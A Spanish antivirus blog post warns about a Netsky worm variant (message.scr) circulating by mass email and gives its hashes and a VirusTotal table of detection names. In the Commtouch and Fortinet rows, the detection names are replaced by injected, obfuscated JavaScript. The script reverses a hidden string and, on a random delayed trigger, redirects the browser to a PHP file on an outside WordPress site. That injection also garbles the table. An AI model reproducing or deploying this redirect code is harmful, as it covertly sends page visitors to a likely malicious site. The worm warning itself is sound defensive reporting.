Variante de NETSKY está llegando anexado a un mail masivo
Otra vez llega este conocido malware, anexado a un mail masivo
Ya es controlado de antaño por el ELINETSA, pero siguen enviandolo a por los que no tienen antivirus residente…
El preanalisis de virustotal ofrece este informe:
MD5 3018e99857f31a59e0777396ae634a8f
SHA1 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
SHA256: c8fffb2e737514c551b2d7bcaf8baa459564b059cab1a35a3cec4b3c270d4525
Nombre: message.scr
Detecciones: 45 / 47
Fecha de análisis: 2013-12-27 16:14:54 UTC ( hace 3 minutos )
1 14
Antivirus Resultado Actualización
Ad-Aware Win32.Generic.497472 20131226
Agnitum I-Worm.NetSky!4NWvXC1SwiU 20131227
AhnLab-V3 20131227
AntiVir Worm/Netsky.AP 20131227
Antiy-AVL Worm/Win32.NetSky 20131227
Avast Win32:Netsky-AF [Wrm] 20131227
AVG I-Worm/Netsky 20131227
Baidu-International Worm.Win32.NetSky.AHuh 20131213
BitDefender Win32.Generic.497472 20131227
Bkav W32.SkyNetP.Worm 20131227
ByteHero 20131226
CAT-QuickHeal W32.NetSky.P 20131222
ClamAV Worm.NetSky-14 20131227
Commtouch $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm 20131227
F-Secure Win32.Generic.497472 20131227
Fortinet $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM 20131227
McAfee-GW-Edition Heuristic.BehavesLike.Win32.Suspicious-PKR.G 20131227
Microsoft Worm:Win32/Netsky.P@mm 20131227
MicroWorld-eScan Win32.Generic.497472 20131227
NANO-Antivirus Trojan.Win32.NetSky.idzx 20131227
Norman Netsky.P 20131227
nProtect Worm/W32.NetSky.29568 20131227
Panda W32/Netsky.AE.worm 20131227
Rising PE:Trojan.Win32.Generic.129CEE65!312274533 20131227
Sophos W32/Netsky-P 20131227
SUPERAntiSpyware Worm.Netsky-P 20131227
Symantec __________
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Los comentarios están cerrados.